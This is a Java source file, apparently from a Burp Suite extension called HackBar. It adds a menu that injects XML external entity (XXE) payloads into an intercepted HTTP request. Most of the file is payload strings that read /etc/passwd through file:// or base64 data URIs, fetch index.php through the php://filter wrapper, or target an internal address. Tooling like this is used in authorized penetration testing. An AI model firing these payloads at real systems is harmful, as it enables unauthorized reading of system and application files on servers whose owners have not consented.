HackBar-burp-extention-/XXE_Menu.java at main · errorfiathck/HackBar-burp-extention- · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86

package burp;

import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import javax.swing.JMenu;

/**
 *
 * @author errorfiathck
 */
public class XXE_Menu extends JMenu {
    public BurpExtender myburp;
    public String[] XXE_MenuItems = {"Basic Test","XXE 1", "XXE 2", "XXE 3", "Php wrapper in XXE", "Php wrapper in XXE 2"};

    XXE_Menu(BurpExtender burp){
        this.setText("XXE Snippets");
        this.myburp = burp;
        Methods.add_MenuItem_and_listener(this, XXE_MenuItems, new XXEItemListener(myburp));
    }
}


class XXEItemListener implements ActionListener {

    BurpExtender myburp;
    XXEItemListener(BurpExtender burp) {
        myburp = burp;
    }

    @Override
    public void actionPerformed(ActionEvent e) {
        int[] selectedIndex = myburp.context.getSelectionBounds();
        IHttpRequestResponse req = myburp.context.getSelectedMessages()[0];
        byte[] request = req.getRequest();
        byte[] param = new byte[selectedIndex[1]-selectedIndex[0]];
        System.arraycopy(request, selectedIndex[0], param, 0, selectedIndex[1]-selectedIndex[0]);
        String selectString = new String(param);
        String action = e.getActionCommand();
        byte[] newRequest = do_XXE(request, selectString, action, selectedIndex);
        req.setRequest(newRequest);
    }

    public byte[] do_XXE(byte[] request, String selectedString, String action, int[] selectedIndex){
        switch(action){
            case "Basic Test":
                selectedString =    "<!--?xml version=\"1.0\" ?-->\n" +
                                    "<!DOCTYPE replace [<!ENTITY example \"Doe\"> ]>\n" +
                                    " <userInfo>\n" +
                                    "  <firstName>John</firstName>\n" +
                                    "  <lastName>&example;</lastName>\n" +
                                    " </userInfo>";
                break;
            case "XXE 1":
                selectedString =    "<?xml version=\"1.0\"?>\n" +
                                    "<!DOCTYPE data [\n" +
                                    "<!ELEMENT data (#ANY)>\n" +
                                    "<!ENTITY file SYSTEM \"file:///etc/passwd\">\n" +
                                    "]>\n";
                break;
            case "XXE 2":
                selectedString =    "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n" +
                                    "  <!DOCTYPE foo [  \n" +
                                    "  <!ELEMENT foo ANY >\n" +
                                    "  <!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]>";
                break;
            case "XXE 3":
                selectedString = "<!DOCTYPE test [ <!ENTITY % init SYSTEM \"data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk\"> %init; ]><foo/>";
                break;
            case "Php wrapper in XXE":
                selectedString = "<!DOCTYPE replace [<!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource=index.php\"> ]>";
                break;
            case "Php wrapper in XXE 2":
                selectedString =    "<!DOCTYPE foo [\n" +
                                    "<!ELEMENT foo ANY >\n" +
                                    "<!ENTITY % xxe SYSTEM \"php://filter/convert.bae64-encode/resource=http://10.0.0.3\" >\n" +
                                    "]>";
                break;
            default:
                break;
        }
        return Methods.do_modify_request(request, selectedIndex, selectedString);
    }


}